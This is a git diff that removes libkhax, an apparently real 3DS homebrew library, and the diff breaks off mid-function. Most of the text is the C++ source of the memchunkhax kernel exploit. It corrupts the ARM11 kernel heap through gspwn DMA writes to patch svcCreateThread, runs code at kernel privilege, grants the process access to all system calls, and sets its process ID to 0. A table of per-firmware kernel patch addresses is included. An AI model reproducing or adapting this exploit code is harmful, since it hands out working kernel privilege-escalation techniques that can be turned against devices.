diff options
| -rw-r--r-- | 3ds/libkhax/LICENSE | 22 | ||||
| -rw-r--r-- | 3ds/libkhax/khax.h | 16 | ||||
| -rw-r--r-- | 3ds/libkhax/khaxinit.cpp | 1110 | ||||
| -rw-r--r-- | 3ds/libkhax/khaxinternal.h | 339 | ||||
| -rw-r--r-- | Makefile | 2 |
5 files changed, 1 insertions, 1488 deletions
diff --git a/3ds/libkhax/LICENSE b/3ds/libkhax/LICENSE deleted file mode 100644 index 1456b22..0000000 --- a/3ds/libkhax/LICENSE +++ /dev/null @@ -1,22 +0,0 @@ -The MIT License (MIT) - -Copyright (c) 2015 Myriachan - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - diff --git a/3ds/libkhax/khax.h b/3ds/libkhax/khax.h deleted file mode 100644 index 21051c3..0000000 --- a/3ds/libkhax/khax.h +++ /dev/null @@ -1,16 +0,0 @@ -#pragma once
-
-#include <3ds.h>
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-// Initialize and do the initial pwning of the ARM11 kernel.
-Result khaxInit();
-// Shut down libkhax
-Result khaxExit();
-
-#ifdef __cplusplus
-}
-#endif
diff --git a/3ds/libkhax/khaxinit.cpp b/3ds/libkhax/khaxinit.cpp deleted file mode 100644 index 795195a..0000000 --- a/3ds/libkhax/khaxinit.cpp +++ /dev/null @@ -1,1110 +0,0 @@ -#include <3ds.h>
-#include <cstddef>
-#include <cstdint>
-#include <cstdio>
-#include <cstdlib>
-#include <cstring>
-#include <limits>
-
-#include "khax.h"
-#include "khaxinternal.h"
-
-//------------------------------------------------------------------------------------------------
-namespace KHAX
-{
- //------------------------------------------------------------------------------------------------
- // Kernel and hardware version information.
- struct VersionData
- {
- // New 3DS?
- bool m_new3DS;
- // Kernel version number
- u32 m_kernelVersion;
- // Nominal version number lower bound (for informational purposes only)
- u32 m_nominalVersion;
- // Patch location in svcCreateThread
- u32 m_threadPatchAddress;
- // Original version of code at m_threadPatchAddress
- static constexpr const u32 m_threadPatchOriginalCode = 0x8DD00CE5;
- // System call unlock patch location
- u32 m_syscallPatchAddress;
- // Kernel virtual address mapping of FCRAM
- u32 m_fcramVirtualAddress;
- // Physical mapping of FCRAM on this machine
- static constexpr const u32 m_fcramPhysicalAddress = 0x20000000;
- // Physical size of FCRAM on this machine
- u32 m_fcramSize;
- // Address of KThread address in kernel (KThread **)
- static constexpr KThread **const m_currentKThreadPtr = reinterpret_cast<KThread **>(0xFFFF9000);
- // Address of KProcess address in kernel (KProcess **)
- static constexpr void **const m_currentKProcessPtr = reinterpret_cast<void **>(0xFFFF9004);
- // Pseudo-handle of the current KProcess.
- static constexpr const Handle m_currentKProcessHandle = 0xFFFF8001;
- // Returned pointers within a KProcess object. This abstracts out which particular
- // version of the KProcess object is in use.
- struct KProcessPointers
- {
- KSVCACL *m_svcAccessControl;
- u32 *m_kernelFlags;
- u32 *m_processID;
- };
- // Creates a KProcessPointers for this kernel version and pointer to the object.
- KProcessPointers(*m_makeKProcessPointers)(void *kprocess);
-
- // Convert a user-mode virtual address in the linear heap into a kernel-mode virtual
- // address using the version-specific information in this table entry.
- void *ConvertLinearUserVAToKernelVA(void *address) const;
-
- // Retrieve a VersionData for this kernel, or null if not recognized.
- static const VersionData *GetForCurrentSystem();
-
- private:
- // Implementation behind m_makeKProcessPointers.
- template <typename KProcessType>
- static KProcessPointers MakeKProcessPointers(void *kprocess);
-
- // Table of these.
- static const VersionData s_versionTable[];
- };
-
- //------------------------------------------------------------------------------------------------
- // ARM11 kernel hack class.
- class MemChunkHax
- {
- public:
- // Construct using the version information for the current system.
- MemChunkHax(const VersionData *versionData)
- : m_versionData(versionData),
- m_nextStep(1),
- m_corrupted(0),
- m_overwriteMemory(nullptr),
- m_overwriteAllocated(0),
- m_extraLinear(nullptr)
- {
- s_instance = this;
- }
-
- // Free memory and such.
- ~MemChunkHax();
-
- // Umm, don't copy this class.
- MemChunkHax(const MemChunkHax &) = delete;
- MemChunkHax &operator =(const MemChunkHax &) = delete;
-
- // Basic initialization.
- Result Step1_Initialize();
- // Allocate linear memory for the memchunkhax operation.
- Result Step2_AllocateMemory();
- // Free the second and fourth pages of the five.
- Result Step3_SurroundFree();
- // Verify that the freed heap blocks' data matches our expected layout.
- Result Step4_VerifyExpectedLayout();
- // Corrupt svcCreateThread in the ARM11 kernel and create the foothold.
- Result Step5_CorruptCreateThread();
- // Execute svcCreateThread to execute code at SVC privilege.
- Result Step6_ExecuteSVCCode();
- // Grant access to all services.
- Result Step7_GrantServiceAccess();
-
- private:
- // SVC-mode entry point thunk (true entry point).
- static Result Step6a_SVCEntryPointThunk();
- // SVC-mode entry point.
- Result Step6b_SVCEntryPoint();
- // Undo the code patch that Step5_CorruptCreateThread did.
- Result Step6c_UndoCreateThreadPatch();
- // Fix the heap corruption caused as a side effect of step 5.
- Result Step6d_FixHeapCorruption();
- // Grant our process access to all system calls, including svcBackdoor.
- Result Step6e_GrantSVCAccess();
- // Flush instruction and data caches.
- Result Step6f_FlushCaches();
- // Patch the process ID to 0. Runs as svcBackdoor.
- static Result Step7a_PatchPID();
- // Restore the original PID. Runs as svcBackdoor.
- static Result Step7b_UnpatchPID();
-
- // Helper for dumping memory to SD card.
- template <std::size_t S>
- bool DumpMemberToSDCard(const unsigned char (MemChunkHax::*member)[S], const char *filename) const;
-
- // Result returned by hacked svcCreateThread upon success.
- static constexpr const Result STEP6_SUCCESS_RESULT = 0x1337C0DE;
-
- // Version information.
- const VersionData *const m_versionData;
- // Next step number.
- int m_nextStep;
- // Whether we are in a corrupted state, meaning we cannot continue if an error occurs.
- int m_corrupted;
-
- // Free block structure in the kernel, the one used in the memchunkhax exploit.
- struct HeapFreeBlock
- {
- int m_count;
- HeapFreeBlock *m_next;
- HeapFreeBlock *m_prev;
- int m_unknown1;
- int m_unknown2;
- };
-
- // The layout of a memory page.
- union Page
- {
- unsigned char m_bytes[4096];
- HeapFreeBlock m_freeBlock;
- };
-
- // The linear memory allocated for the memchunkhax overwrite.
- struct OverwriteMemory
- {
- union
- {
- unsigned char m_bytes[6 * 4096];
- Page m_pages[6];
- };
- };
- OverwriteMemory *m_overwriteMemory;
- unsigned m_overwriteAllocated;
-
- // Additional linear memory buffer for temporary purposes.
- union ExtraLinearMemory
- {
- ALIGN(64) unsigned char m_bytes[64];
- // When interpreting as a HeapFreeBlock.
- HeapFreeBlock m_freeBlock;
- };
- // Must be a multiple of 16 for use with gspwn.
- static_assert(sizeof(ExtraLinearMemory) % 16 == 0, "ExtraLinearMemory isn't a multiple of 16 bytes");
- ExtraLinearMemory *m_extraLinear;
-
- // Copy of the old ACL
- KSVCACL m_oldACL;
-
- // Original process ID.
- u32 m_originalPID;
-
- // Buffers for dumped data when debugging.
- #ifdef KHAX_DEBUG_DUMP_DATA
- unsigned char m_savedKProcess[sizeof(KProcess_8_0_0_New)];
- unsigned char m_savedKThread[sizeof(KThread)];
- unsigned char m_savedThreadSVC[0x100];
- #endif
-
- // Pointer to our instance.
- static MemChunkHax *volatile s_instance;
- };
-
- //------------------------------------------------------------------------------------------------
- // Make an error code
- inline Result MakeError(Result level, Result summary, Result module, Result error);
- enum : Result { KHAX_MODULE = 254 };
- // Check whether this system is a New 3DS.
- Result IsNew3DS(bool *answer, u32 kernelVersionAlreadyKnown = 0);
- // gspwn, meant for reading from or writing to freed buffers.
- Result GSPwn(void *dest, const void *src, std::size_t size, bool wait = true);
- // Given a pointer to a structure that is a member of another structure,
- // return a pointer to the outer structure. Inspired by Windows macro.
- template <typename Outer, typename Inner>
- Outer *ContainingRecord(Inner *member, Inner Outer::*field);
-}
-
-
-//------------------------------------------------------------------------------------------------
-//
-// Class VersionData
-//
-
-//------------------------------------------------------------------------------------------------
-// Creates a KProcessPointers for this kernel version and pointer to the object.
-template <typename KProcessType>
-KHAX::VersionData::KProcessPointers KHAX::VersionData::MakeKProcessPointers(void *kprocess)
-{
- KProcessType *kproc = static_cast<KProcessType *>(kprocess);
-
- KProcessPointers result;
- result.m_svcAccessControl = &kproc->m_svcAccessControl;
- result.m_processID = &kproc->m_processID;
- result.m_kernelFlags = &kproc->m_kernelFlags;
- return result;
-}
-
-//------------------------------------------------------------------------------------------------
-// System version table
-const KHAX::VersionData KHAX::VersionData::s_versionTable[] =
-{
-#define KPROC_FUNC(ver) MakeKProcessPointers<KProcess_##ver>
-
- // Old 3DS, old address layout
- { false, SYSTEM_VERSION(2, 34, 0), SYSTEM_VERSION(4, 1, 0), 0xEFF83C9F, 0xEFF827CC, 0xF0000000, 0x08000000, KPROC_FUNC(1_0_0_Old) },
- { false, SYSTEM_VERSION(2, 35, 6), SYSTEM_VERSION(5, 0, 0), 0xEFF83737, 0xEFF822A8, 0xF0000000, 0x08000000, KPROC_FUNC(1_0_0_Old) },
- { false, SYSTEM_VERSION(2, 36, 0), SYSTEM_VERSION(5, 1, 0), 0xEFF83733, 0xEFF822A4, 0xF0000000, 0x08000000, KPROC_FUNC(1_0_0_Old) },
- { false, SYSTEM_VERSION(2, 37, 0), SYSTEM_VERSION(6, 0, 0), 0xEFF83733, 0xEFF822A4, 0xF0000000, 0x08000000, KPROC_FUNC(1_0_0_Old) },
- { false, SYSTEM_VERSION(2, 38, 0), SYSTEM_VERSION(6, 1, 0), 0xEFF83733, 0xEFF822A4, 0xF0000000, 0x08000000, KPROC_FUNC(1_0_0_Old) },
- { false, SYSTEM_VERSION(2, 39, 4), SYSTEM_VERSION(7, 0, 0), 0xEFF83737, 0xEFF822A8, 0xF0000000, 0x08000000, KPROC_FUNC(1_0_0_Old) },
- { false, SYSTEM_VERSION(2, 40, 0), SYSTEM_VERSION(7, 2, 0), 0xEFF83733, 0xEFF822A4, 0xF0000000, 0x08000000, KPROC_FUNC(1_0_0_Old) },
- // Old 3DS, new address layout
- { false, SYSTEM_VERSION(2, 44, 6), SYSTEM_VERSION(8, 0, 0), 0xDFF8376F, 0xDFF82294, 0xE0000000, 0x08000000, KPROC_FUNC(8_0_0_Old) },
- { false, SYSTEM_VERSION(2, 46, 0), SYSTEM_VERSION(9, 0, 0), 0xDFF8383F, 0xDFF82290, 0xE0000000, 0x08000000, KPROC_FUNC(8_0_0_Old) },
- // New 3DS
- { true, SYSTEM_VERSION(2, 45, 5), SYSTEM_VERSION(8, 1, 0), 0xDFF83757, 0xDFF82264, 0xE0000000, 0x10000000, KPROC_FUNC(8_0_0_New) }, // untested
- { true, SYSTEM_VERSION(2, 46, 0), SYSTEM_VERSION(9, 0, 0), 0xDFF83837, 0xDFF82260, 0xE0000000, 0x10000000, KPROC_FUNC(8_0_0_New) },
-
-#undef KPROC_FUNC
-};
-
-//------------------------------------------------------------------------------------------------
-// Convert a user-mode virtual address in the linear heap into a kernel-mode virtual
-// address using the version-specific information in this table entry.
-void *KHAX::VersionData::ConvertLinearUserVAToKernelVA(void *address) const
-{
- static_assert((std::numeric_limits<std::uintptr_t>::max)() == (std::numeric_limits<u32>::max)(),
- "you're sure that this is a 3DS?");
-
- // Need the pointer as an integer.
- u32 addr = reinterpret_cast<u32>(address);
-
- // Convert the address to a physical address, since that's how we know the mapping.
- u32 physical = osConvertVirtToPhys(addr);
- if (physical == 0)
- {
- return nullptr;
- }
-
- // Verify that the address is within FCRAM.
- if ((physical < m_fcramPhysicalAddress) || (physical - m_fcramPhysicalAddress >= m_fcramSize))
- {
- return nullptr;
- }
-
- // Now we can convert.
- return reinterpret_cast<char *>(m_fcramVirtualAddress) + (physical - m_fcramPhysicalAddress);
-}
-
-//------------------------------------------------------------------------------------------------
-// Retrieve a VersionData for this kernel, or null if not recognized.
-const KHAX::VersionData *KHAX::VersionData::GetForCurrentSystem()
-{
- // Get kernel version for comparison.
- u32 kernelVersion = osGetKernelVersion();
-
- // Determine whether this is a New 3DS.
- bool isNew3DS;
- if (IsNew3DS(&isNew3DS, kernelVersion) != 0)
- {
- return nullptr;
- }
-
- // Search our list for a match.
- for (const VersionData *entry = s_versionTable; entry < &s_versionTable[KHAX_lengthof(s_versionTable)]; ++entry)
- {
- // New 3DS flag must match.
- if ((entry->m_new3DS && !isNew3DS) || (!entry->m_new3DS && isNew3DS))
- {
- continue;
- }
- // Kernel version must match.
- if (entry->m_kernelVersion != kernelVersion)
- {
- continue;
- }
-
- return entry;
- }
-
- return nullptr;
-}
-
-
-//------------------------------------------------------------------------------------------------
-//
-// Class MemChunkHax
-//
-
-//------------------------------------------------------------------------------------------------
-KHAX::MemChunkHax *volatile KHAX::MemChunkHax::s_instance = nullptr;
-
-//------------------------------------------------------------------------------------------------
-// Basic initialization.
-Result KHAX::MemChunkHax::Step1_Initialize()
-{
- if (m_nextStep != 1)
- {
- KHAX_printf("MemChunkHax: Invalid step number %d for Step1_Initialize\n", m_nextStep);
- return MakeError(28, 5, KHAX_MODULE, 1016);
- }
-
- // Nothing to do in current implementation.
- ++m_nextStep;
- return 0;
-}
-
-//------------------------------------------------------------------------------------------------
-// Allocate linear memory for the memchunkhax operation.
-Result KHAX::MemChunkHax::Step2_AllocateMemory()
-{
- if (m_nextStep != 2)
- {
- KHAX_printf("MemChunkHax: Invalid step number %d for Step2_AllocateMemory\n", m_nextStep);
- return MakeError(28, 5, KHAX_MODULE, 1016);
- }
-
- // Allocate the linear memory for the overwrite process.
- u32 address = 0xFFFFFFFF;
- Result result = svcControlMemory(&address, 0, 0, sizeof(OverwriteMemory), MEMOP_ALLOC_LINEAR,
- static_cast<MemPerm>(MEMPERM_READ | MEMPERM_WRITE));
-
- KHAX_printf("Step2:res=%08lx addr=%08lx\n", result, address);
-
- if (result != 0)
- {
- return result;
- }
-
- m_overwriteMemory = reinterpret_cast<OverwriteMemory *>(address);
- m_overwriteAllocated = (1u << 6) - 1; // all 6 pages allocated now
-
- // Why didn't we get a page-aligned address?!
- if (address & 0xFFF)
- {
- // Since we already assigned m_overwriteMemory, it'll get freed by our destructor.
- KHAX_printf("Step2:misaligned memory\n");
- return MakeError(26, 7, KHAX_MODULE, 1009);
- }
-
- // Allocate extra memory that we'll need.
- m_extraLinear = static_cast<ExtraLinearMemory *>(linearMemAlign(sizeof(*m_extraLinear),
- alignof(*m_extraLinear)));
- if (!m_extraLinear)
- {
- KHAX_printf("Step2:failed extra alloc\n");
- return MakeError(26, 3, KHAX_MODULE, 1011);
- }
- KHAX_printf("Step2:extra=%p\n", m_extraLinear);
-
- // OK, we're good here.
- ++m_nextStep;
- return 0;
-}
-
-//------------------------------------------------------------------------------------------------
-// Free the second and fourth pages of the five.
-Result KHAX::MemChunkHax::Step3_SurroundFree()
-{
- if (m_nextStep != 3)
- {
- KHAX_printf("MemChunkHax: Invalid step number %d for Step3_AllocateMemory\n", m_nextStep);
- return MakeError(28, 5, KHAX_MODULE, 1016);
- }
-
- // We do this because the exploit involves triggering a heap coalesce. We surround a heap
- // block (page) with two freed pages, then free the middle page. By controlling both outside
- // pages, we know their addresses, and can fix up the corrupted heap afterward.
- //
- // Here's what the heap will look like after step 3:
- //
- // ___XX-X-X___
- //
- // _ = unknown (could be allocated and owned by other code)
- // X = allocated
- // - = allocated then freed by us
- //
- // In step 4, we will free the second page:
- //
- // ___X--X-X___
- //
- // Heap coalescing will trigger due to two adjacent free blocks existing. The fifth page's
- // "previous" pointer will be set to point to the second page rather than the third. We will
- // use gspwn to make that overwrite kernel code instead.
- //
- // We have 6 pages to ensure that we have surrounding allocated pages, giving us a little
- // sandbox to play in. In particular, we can use this design to determine the address of the
- // next block--by controlling the location of the next block.
- u32 dummy;
-
- // Free the third page.
- if (Result result = svcControlMemory(&dummy, reinterpret_cast<u32>(&m_overwriteMemory->m_pages[2]), 0,
- sizeof(m_overwriteMemory->m_pages[2]), MEMOP_FREE, static_cast<MemPerm>(0)))
- {
- KHAX_printf("Step3:svcCM1 failed:%08lx\n", result);
- return result;
- }
- m_overwriteAllocated &= ~(1u << 2);
-
- // Free the fifth page.
- if (Result result = svcControlMemory(&dummy, reinterpret_cast<u32>(&m_overwriteMemory->m_pages[4]), 0,
- sizeof(m_overwriteMemory->m_pages[4]), MEMOP_FREE, static_cast<MemPerm>(0)))
- {
- KHAX_printf("Step3:svcCM2 failed:%08lx\n", result);
- return result;
- }
- m_overwriteAllocated &= ~(1u << 4);
-
- // Attempt to write to remaining pages.
- //KHAX_printf("Step2:probing page [0]\n");
- *static_cast<volatile u8 *>(&m_overwriteMemory->m_pages[0].m_bytes[0]) = 0;
- //KHAX_printf("Step2:probing page [1]\n");
- *static_cast<volatile u8 *>(&m_overwriteMemory->m_pages[1].m_bytes[0]) = 0;
- //KHAX_printf("Step2:probing page [3]\n");
- *static_cast<volatile u8 *>(&m_overwriteMemory->m_pages[3].m_bytes[0]) = 0;
- //KHAX_printf("Step2:probing page [5]\n");
- *static_cast<volatile u8 *>(&m_overwriteMemory->m_pages[5].m_bytes[0]) = 0;
- KHAX_printf("Step3:probing done\n");
-
- // Done.
- ++m_nextStep;
- return 0;
-}
-
-//------------------------------------------------------------------------------------------------
-// Verify that the freed heap blocks' data matches our expected layout.
-Result KHAX::MemChunkHax::Step4_VerifyExpectedLayout()
-{
- if (m_nextStep != 4)
- {
- KHAX_printf("MemChunkHax: Invalid step number %d for Step4_VerifyExpectedLayout\n", m_nextStep);
- return MakeError(28, 5, KHAX_MODULE, 1016);
- }
-
- // Copy the first freed page (third page) out to read its heap metadata.
- std::memset(m_extraLinear, 0xCC, sizeof(*m_extraLinear));
-
- if (Result result = GSPwn(m_extraLinear, &m_overwriteMemory->m_pages[2],
- sizeof(*m_extraLinear)))
- {
- KHAX_printf("Step4:gspwn failed:%08lx\n", result);
- return result;
- }
-
- // Debug information about the memory block
- KHAX_printf("Step4:[2]u=%p k=%p\n", &m_overwriteMemory->m_pages[2], m_versionData->
- ConvertLinearUserVAToKernelVA(&m_overwriteMemory->m_pages[2]));
- KHAX_printf("Step4:[2]n=%p p=%p c=%d\n", m_extraLinear->m_freeBlock.m_next,
- m_extraLinear->m_freeBlock.m_prev, m_extraLinear->m_freeBlock.m_count);
-
- // The next page from the third should equal the fifth page.
- if (m_extraLinear->m_freeBlock.m_next != m_versionData->ConvertLinearUserVAToKernelVA(
- &m_overwriteMemory->m_pages[4]))
- {
- KHAX_printf("Step4:[2]->next != [4]\n");
- KHAX_printf("Step4:%p %p %p\n", m_extraLinear->m_freeBlock.m_next,
- m_versionData->ConvertLinearUserVAToKernelVA(&m_overwriteMemory->m_pages[4]),
- &m_overwriteMemory->m_pages[4]);
- return MakeError(26, 5, KHAX_MODULE, 1014);
- }
-
- // Copy the second freed page (fifth page) out to read its heap metadata.
- std::memset(m_extraLinear, 0xCC, sizeof(*m_extraLinear));
-
- if (Result result = GSPwn(m_extraLinear, &m_overwriteMemory->m_pages[4],
- sizeof(*m_extraLinear)))
- {
- KHAX_printf("Step4:gspwn failed:%08lx\n", result);
- return result;
- }
-
- KHAX_printf("Step4:[4]u=%p k=%p\n", &m_overwriteMemory->m_pages[4], m_versionData->
- ConvertLinearUserVAToKernelVA(&m_overwriteMemory->m_pages[4]));
- KHAX_printf("Step4:[4]n=%p p=%p c=%d\n", m_extraLinear->m_freeBlock.m_next,
- m_extraLinear->m_freeBlock.m_prev, m_extraLinear->m_freeBlock.m_count);
-
- // The previous page from the fifth should equal the third page.
- if (m_extraLinear->m_freeBlock.m_prev != m_versionData->ConvertLinearUserVAToKernelVA(
- &m_overwriteMemory->m_pages[2]))
- {
- KHAX_printf("Step4:[4]->prev != [2]\n");
- KHAX_printf("Step4:%p %p %p\n", m_extraLinear->m_freeBlock.m_prev,
- m_versionData->ConvertLinearUserVAToKernelVA(&m_overwriteMemory->m_pages[2]),
- &m_overwriteMemory->m_pages[2]);
- return MakeError(26, 5, KHAX_MODULE, 1014);
- }
-
- // Validation successful
- ++m_nextStep;
- return 0;
-}
-
-//------------------------------------------------------------------------------------------------
-// Corrupt svcCreateThread in the ARM11 kernel and create the foothold.
-Result KHAX::MemChunkHax::Step5_CorruptCreateThread()
-{
- if (m_nextStep != 5)
- {
- KHAX_printf("MemChunkHax: Invalid step number %d for Step5_CorruptCreateThread\n", m_nextStep);
- return MakeError(28, 5, KHAX_MODULE, 1016);
- }
-
- // Read the memory page we're going to gspwn.
- if (Result result = GSPwn(m_extraLinear, &m_overwriteMemory->m_pages[2].m_freeBlock,
- sizeof(*m_extraLinear)))
- {
- KHAX_printf("Step5:gspwn read failed:%08lx\n", result);
- return result;
- }
-
- // Adjust the "next" pointer to point to within the svcCreateThread system call so as to
- // corrupt certain instructions. The result will be that calling svcCreateThread will result
- // in executing our code.
- // NOTE: The overwrite is modifying the "m_prev" field, so we subtract the offset of m_prev.
- // That is, the overwrite adds this offset back in.
- m_extraLinear->m_freeBlock.m_next = reinterpret_cast<HeapFreeBlock *>(
- m_versionData->m_threadPatchAddress - offsetof(HeapFreeBlock, m_prev));
-
- // Do the GSPwn, the actual exploit we've been waiting for.
- if (Result result = GSPwn(&m_overwriteMemory->m_pages[2].m_freeBlock, m_extraLinear,
- sizeof(*m_extraLinear)))
- {
- KHAX_printf("Step5:gspwn exploit failed:%08lx\n", result);
- return result;
- }
-
- // The heap is now corrupted in two ways (Step6 explains why two ways).
- m_corrupted += 2;
-
- KHAX_printf("Step5:gspwn succeeded; heap now corrupt\n");
-
- // Corrupt svcCreateThread by freeing the second page. The kernel will coalesce the third
- // page into the second page, and in the process zap an instruction pair in svcCreateThread.
- u32 dummy;
- if (Result result = svcControlMemory(&dummy, reinterpret_cast<u32>(&m_overwriteMemory->m_pages[1]),
- 0, sizeof(m_overwriteMemory->m_pages[1]), MEMOP_FREE, static_cast<MemPerm>(0)))
- {
- KHAX_printf("Step5:free to pwn failed:%08lx\n", result);
- return result;
- }
- m_overwriteAllocated &= ~(1u << 1);
-
- // We have an additional layer of instability because of the kernel code overwrite.
- ++m_corrupted;
-
- KHAX_printf("Step5:svcCreateThread now hacked\n");
-
- ++m_nextStep;
- return 0;
-}
-
-//------------------------------------------------------------------------------------------------
-// Execute svcCreateThread to execute code at SVC privilege.
-Result KHAX::MemChunkHax::Step6_ExecuteSVCCode()
-{
- if (m_nextStep != 6)
- {
- KHAX_printf("MemChunkHax: Invalid step number %d for Step6_ExecuteSVCCode\n", m_nextStep);
- return MakeError(28, 5, KHAX_MODULE, 1016);
- }
-
- // Call svcCreateThread such that r0 is the desired exploit function. Note that the
- // parameters to the usual system call thunk are rearranged relative to the actual system call
- // - the thread priority parameter is actually the one that goes into r0. In addition, we
- // want to pass other parameters that make for an illegal thread creation request, because the
- // rest of the thread creation SVC occurs before the hacked code gets executed. We want the
- // thread creation request to fail, then the hack to grant us control. Processor ID
- // 0x7FFFFFFF seems to do the trick here.
- Handle dummyHandle;
- Result result = svcCreateThread(&dummyHandle, nullptr, 0, nullptr, reinterpret_cast<s32>(
- Step6a_SVCEntryPointThunk), (std::numeric_limits<s32>::max)());
-
- KHAX_printf("Step6:SVC mode returned: %08lX %d\n", result, m_nextStep);
-
- if (result != STEP6_SUCCESS_RESULT)
- {
- // If the result was 0, something actually went wrong.
- if (result == 0)
- {
- result = MakeError(27, 11, KHAX_MODULE, 1023);
- }
-
- return result;
- }
-
-#ifdef KHAX_DEBUG
- char oldACLString[KHAX_lengthof(m_oldACL) * 2 + 1];
- char *sp = oldACLString;
- for (unsigned char b : m_oldACL)
- {
- *sp++ = "0123456789abcdef"[b >> 4];
- *sp++ = "0123456789abcdef"[b & 15];
- }
- *sp = '\0';
-
- KHAX_printf("oldACL:%s\n", oldACLString);
-#endif
-
- ++m_nextStep;
- return 0;
-}
-
-//------------------------------------------------------------------------------------------------
-// SVC-mode entry point thunk (true entry point).
-#ifndef _MSC_VER
-__attribute__((__naked__))
-#endif
-Result KHAX::MemChunkHax::Step6a_SVCEntryPointThunk()
-{
- __asm__ volatile("add sp, sp, #8");
-
- register Result result __asm__("r0") = s_instance->Step6b_SVCEntryPoint();
-
- __asm__ volatile("ldr pc, [sp], #4" : : "r"(result));
-}
-
-//------------------------------------------------------------------------------------------------
-// SVC-mode entry point.
-#ifndef _MSC_VER
-__attribute__((__noinline__))
-#endif
-Result KHAX::MemChunkHax::Step6b_SVCEntryPoint()
-{
- if (Result result = Step6c_UndoCreateThreadPatch())
- {
- return result;
- }
- if (Result result = Step6d_FixHeapCorruption())
- {
- return result;
- }
- if (Result result = Step6e_GrantSVCAccess())
- {
- return result;
- }
- if (Result result = Step6f_FlushCaches())
- {
- return result;
- }
-
- return STEP6_SUCCESS_RESULT;
-}
-
-//------------------------------------------------------------------------------------------------
-// Undo the code patch that Step5_CorruptCreateThread did.
-Result KHAX::MemChunkHax::Step6c_UndoCreateThreadPatch()
-{
- // Unpatch svcCreateThread. NOTE: Misaligned pointer.
- *reinterpret_cast<u32 *>(m_versionData->m_threadPatchAddress) = m_versionData->
- m_threadPatchOriginalCode;
- --m_corrupted;
-
- return 0;
-}
-
-//------------------------------------------------------------------------------------------------
-// Fix the heap corruption caused as a side effect of step 5.
-Result KHAX::MemChunkHax::Step6d_FixHeapCorruption()
-{
- // The kernel's heap coalesce code seems to be like the following for the case we triggered,
- // where we're freeing a block before ("left") an adjacent block ("right"):
- //
- // (1) left->m_count += right->m_count;
- // (2) left->m_next = right->m_next;
- // (3) right->m_next->m_prev = left;
- //
- // (1) should have happened normally. (3) is what we exploit: we set right->m_next to point
- // to where we want to patch, such that the write to m_prev is the desired code overwrite.
- // (2) is copying the value we put into right->m_next to accomplish (3).
- //
- // As a result of these shenanigans, we have two fixes to do to the heap: fix left->m_next to
- // point to the correct next free block, and do the write to right->m_next->m_prev that didn't
- // happen because it instead was writing to kernel code.
-
- // "left" is the second overwrite page.
- auto left = static_cast<HeapFreeBlock *>(m_versionData->ConvertLinearUserVAToKernelVA(
- &m_overwriteMemory->m_pages[1].m_freeBlock));
- // "right->m_next" is the fifth overwrite page.
- auto rightNext = static_cast<HeapFreeBlock *>(m_versionData->ConvertLinearUserVAToKernelVA(
- &m_overwriteMemory->m_pages[4].m_freeBlock));
-
- // Do the two fixups.
- left->m_next = rightNext;
- --m_corrupted;
-
- rightNext->m_prev = left;
- --m_corrupted;
-
- return 0;
-}
-
-//------------------------------------------------------------------------------------------------
-// Grant our process access to all system calls, including svcBackdoor.
-Result KHAX::MemChunkHax::Step6e_GrantSVCAccess()
-{
- // Everything, except nonexistent services 00, 7E or 7F.
- static constexpr const char s_fullAccessACL[] = "\xFE\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x3F";
-
- // Get the KThread pointer. Its type doesn't vary, so far.
- KThread *kthread = *m_versionData->m_currentKThreadPtr;
-
- // Debug dumping.
-#ifdef KHAX_DEBUG_DUMP_DATA
- // Get the KProcess pointer, whose type varies by kernel version.
- void *kprocess = *m_versionData->m_currentKProcessPtr;
-
- void *svcData = reinterpret_cast<void *>(reinterpret_cast<std::uintptr_t>(kthread->m_svcRegisterState) & ~std::uintptr_t(0xFF));
- std::memcpy(m_savedKProcess, kprocess, sizeof(m_savedKProcess));
- std::memcpy(m_savedKThread, kthread, sizeof(m_savedKThread));
- std::memcpy(m_savedThreadSVC, svcData, sizeof(m_savedThreadSVC));
-#endif
-
- // Get a pointer to the SVC ACL within the SVC area for the thread.
- SVCThreadArea *svcThreadArea = ContainingRecord<SVCThreadArea>(kthread->m_svcRegisterState, &SVCThreadArea::m_svcRegisterState);
- KSVCACL &threadACL = svcThreadArea->m_svcAccessControl;
-
- // Save the old one for diagnostic purposes.
- std::memcpy(m_oldACL, threadACL, sizeof(threadACL));
-
- // Set the ACL for the current thread.
- std::memcpy(threadACL, s_fullAccessACL, sizeof(threadACL));
-
- return 0;
-}
-
-//------------------------------------------------------------------------------------------------
-// Flush instruction and data caches.
-Result KHAX::MemChunkHax::Step6f_FlushCaches()
-{
- // Invalidates the entire instruction cache.
- __asm__ volatile(
- "mov r0, #0\n\t"
- "mcr p15, 0, r0, c7, c5, 0\n\t");
-
- // Invalidates the entire data cache.
- __asm__ volatile(
- "mov r0, #0\n\t"
- "mcr p15, 0, r0, c7, c10, 0\n\t");
-
- return 0;
-}
-
-//------------------------------------------------------------------------------------------------
-// Grant access to all services.
-Result KHAX::MemChunkHax::Step7_GrantServiceAccess()
-{
- // Backup the original PID.
- Result result = svcGetProcessId(&m_originalPID, m_versionData->m_currentKProcessHandle);
- if (result != 0)
- {
- KHAX_printf("Step7:GetPID1 fail:%08lx\n", result);
- return result;
- }
-
- KHAX_printf("Step7:current pid=%lu\n", m_originalPID);
-
- // Patch the PID to 0, granting access to all services.
- svcBackdoor(Step7a_PatchPID);
-
- // Check whether PID patching succeeded.
- u32 newPID;
- result = svcGetProcessId(&newPID, m_versionData->m_currentKProcessHandle);
- if (result != 0)
- {
- // Attempt patching back anyway, for stability reasons.
- svcBackdoor(Step7b_UnpatchPID);
